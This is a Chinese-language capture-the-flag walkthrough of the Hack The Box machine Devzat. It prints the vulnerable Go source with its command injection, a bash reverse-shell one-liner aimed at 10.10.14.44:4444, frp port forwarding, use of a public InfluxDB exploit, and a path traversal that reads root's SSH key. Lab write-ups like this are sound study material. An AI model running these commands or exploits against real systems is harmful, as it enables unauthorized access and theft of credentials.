信息收集
目标主机开放了web服务、ssh服务和另外一个在8000端口开放的ssh服务
我们尝试连接8000端口的ssh服务,发现是一个聊天窗口
查看完可执行的命令后,还是没有新的发现
访问web服务时,发现只是一个普通的推销网站而已,并且扫描目录文件时也没有发现有价值的信息
dirsearch -u "http://devzat.htb/" -e * -x404,403,500 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
既然没有有价值的信息,那么我们就得切换思路了,我们得尝试扫描是否存在子域名,存在一个pets子域
wfuzz -c -u "http://devzat.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 26 -H "HOST:FUZZ.devzat.htb"
访问子域网站的页面,发现是一个添加宠物姓名的一个功能站点
我们对这个url路径进行目录扫描,发现了一个git源码泄露
dirsearch -u "http://pets.devzat.htb" -e * -x404,403,500 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
访问目录时,我们发现存在以下目录。我们使用GitTools工具还原源码数据
还原出源码之后,我们看到存在一个main.go文件,我们可以打开main.go文件审计源码看看是否存在漏洞
漏洞利用
我们看到代码cmd := exec.Command("sh", "-c", "cat characteristics/"+species)处存在一个命令注入,而且功能处是添加species种类处,我们可以利用这点执行恶意的代码。
package main
import (
"embed"
"encoding/json"
"fmt"
"io/fs"
"io/ioutil"
"log"
"net/http"
"os/exec"
"time"
)
//go:embed static/public
var web embed.FS
//go:embed static/public/index.html
var index []byte
type Pet struct {
Name string `json:"name"`
Species string `json:"species"`
Characteristics string `json:"characteristics"`
}
var (
Pets []Pet = []Pet{
{Name: "Cookie", Species: "cat", Characteristics: loadCharacter("cat")},
{Name: "Mia", Species: "cat", Characteristics: loadCharacter("cat")},
{Name: "Chuck", Species: "dog", Characteristics: loadCharacter("dog")},
{Name: "Balu", Species: "dog", Characteristics: loadCharacter("dog")},
{Name: "Georg", Species: "gopher", Characteristics: loadCharacter("gopher")},
{Name: "Gustav", Species: "giraffe", Characteristics: loadCharacter("giraffe")},
{Name: "Rudi", Species: "redkite", Characteristics: loadCharacter("redkite")},
{Name: "Bruno", Species: "bluewhale", Characteristics: loadCharacter("bluewhale")},
}
)
func loadCharacter(species string) string {
cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
stdoutStderr, err := cmd.CombinedOutput()
if err != nil {
return err.Error()
}
return string(stdoutStderr)
}
func getPets(w http.ResponseWriter, r *http.Request) {
json.NewEncoder(w).Encode(Pets)
}
func addPet(w http.ResponseWriter, r *http.Request) {
reqBody, _ := ioutil.ReadAll(r.Body)
var addPet Pet
err := json.Unmarshal(reqBody, &addPet)
if err != nil {
e := fmt.Sprintf("There has been an error: %+v", err)
http.Error(w, e, http.StatusBadRequest)
return
}
addPet.Characteristics = loadCharacter(addPet.Species)
Pets = append(Pets, addPet)
w.WriteHeader(http.StatusOK)
fmt.Fprint(w, "Pet was added successfully")
}
func handleRequest() {
build, err := fs.Sub(web, "static/public/build")
if err != nil {
panic(err)
}
css, err := fs.Sub(web, "static/public/css")
if err != nil {
panic(err)
}
webfonts, err := fs.Sub(web, "static/public/webfonts")
if err != nil {
panic(err)
}
spaHandler := http.HandlerFunc(spaHandlerFunc)
// Single page application handler
http.Handle("/", headerMiddleware(spaHandler))
// All static folder handler
http.Handle("/build/", headerMiddleware(http.StripPrefix("/build", http.FileServer(http.FS(build)))))
http.Handle("/css/", headerMiddleware(http.StripPrefix("/css", http.FileServer(http.FS(css)))))
http.Handle("/webfonts/", headerMiddleware(http.StripPrefix("/webfonts", http.FileServer(http.FS(webfonts)))))
http.Handle("/.git/", headerMiddleware(http.StripPrefix("/.git", http.FileServer(http.Dir(".git")))))
// API routes
apiHandler := http.HandlerFunc(petHandler)
http.Handle("/api/pet", headerMiddleware(apiHandler))
log.Fatal(http.ListenAndServe(":5000", nil))
}
func spaHandlerFunc(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
w.Write(index)
}
func petHandler(w http.ResponseWriter, r *http.Request) {
// Dispatch by method
if r.Method == http.MethodPost {
addPet(w, r)
} else if r.Method == http.MethodGet {
getPets(w, r)
} else {
http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
}
// TODO: Add Update and Delete
}
func headerMiddleware(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.Header().Add("Server", "My genious go pet server")
next.ServeHTTP(w, r)
})
}
func main() {
resetTicker := time.NewTicker(5 * time.Second)
done := make(chan bool)
go func() {
for {
select {
case <-done:
return
case <-resetTicker.C:
// Reset Pets to prestaged ones
Pets = []Pet{
{Name: "Cookie", Species: "cat", Characteristics: loadCharacter("cat")},
{Name: "Mia", Species: "cat", Characteristics: loadCharacter("cat")},
{Name: "Chuck", Species: "dog", Characteristics: loadCharacter("dog")},
{Name: "Balu", Species: "dog", Characteristics: loadCharacter("dog")},
{Name: "Georg", Species: "gopher", Characteristics: loadCharacter("gopher")},
{Name: "Gustav", Species: "giraffe", Characteristics: loadCharacter("giraffe")},
{Name: "Rudi", Species: "redkite", Characteristics: loadCharacter("redkite")},
{Name: "Bruno", Species: "bluewhale", Characteristics: loadCharacter("bluewhale")},
}
}
}
}()
handleRequest()
time.Sleep(500 * time.Millisecond)
resetTicker.Stop()
done <- true
}
为了检测我们的代码可以成功运行,我们可以先使用ping命令检测是否能ping通我们本地的机器,抓包工具选择tcpdump较为方便
返回的结果是成功执行了命令,那么我们可以将我们的恶意代码进行base64编码,目的是为了确保命令执行时不会出现渲染问题。payload的设置是:先将编码的字符串进行解码,解码之后传给管道符以bash命令运行
echo -n 'bash -i >& /dev/tcp/10.10.14.44/4444 0>&1' | base64
反弹shell到本地机器上
提权到catherine
拿到shell后,发现我们并没有权限查看user.txt文件的权限,并且home目录下存在另一个账户catherine。初步判断应该是要提权到这个用户权限上。我们使用万能提权脚本linpeas.sh上传到目标机器上运行,发现目标机器上以root权限运行着一个docker代理程序,并且运行的端口为8086
因为目标机器的8086端口对外网不开放,所以我们必须使用内网穿透工具,利用端口转发技术将8086端口转发到我们的VPS机器上进行访问,所使用的工具是frp。我们先上传客户端到目标机器上,并在本机上运行服务端
客户端配置信息,server_addr是本机地址,server_port不用更改,local_port是要转发到本地机器的端口,remote_port是要被转发的机器的目标端口
穿透代理搭建成功后,我们可以扫描本地机子的8086端口,了解到开放的是InfluxDB服务
在EDB上尝试过很多的exp,但是都没有成功。但是在github上发现了一个披露了的exp,经过验证发现可以利用成功,链接地址为https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933
发现了两个数据库,一个数据表,并查询数据表的信息,发现了catherine用户名的密码
那么就获取到了user.txt文件的权限了
提权到ROOT
没办法,我们找二进制文件也没找到个所以然,只能再运行一遍神器linpeas.sh这个脚本了。在/var/backups这个目录上,发现了很多有趣的文件,如devzat-main.zip、devzat-dev.zip这两个压缩包
将其复制到tmp目录解压,查看其中的commands.go文件存在可利用的漏洞点,比较main目录和dev目录下的commands.go文件的不同发现有一处对密码进行校验。这里我们要注意两个点,一个是fileCommand的方法,另一个是校验安全密码,如果密码不对直接结束方法。
diff commands.go ../dev/commands.go
在审计GO代码时,我们发现对应的方法名字就是我们能执行命令的名字,但是唯独缺少了这个file命令,而且还存在校验密码的环节,所以很有可能是突破口。在审计dev目录下的devchat.go文件发现,dev目录的功能是运行在目标主机的8443端口
但是我发现在反弹的shell中,并不能实现ssh的内部端口连接。但是很幸运我在.ssh中找到了登录凭据
成功使用patrick账户登录
发现没有密码,均报错
我们尝试使用密码看看返回信息有什么不同,它说不存在这个目录,那我们返回上一目录直接读取到flag了
同时我们也可以读取root的id_rsa进行获取root权限
总结
总的来说这个靶机相当复杂,同时考验GO语言的代码审计能力,获取权限的方式比较复杂,但是更加偏向于实战,这是一个非常出色的靶机。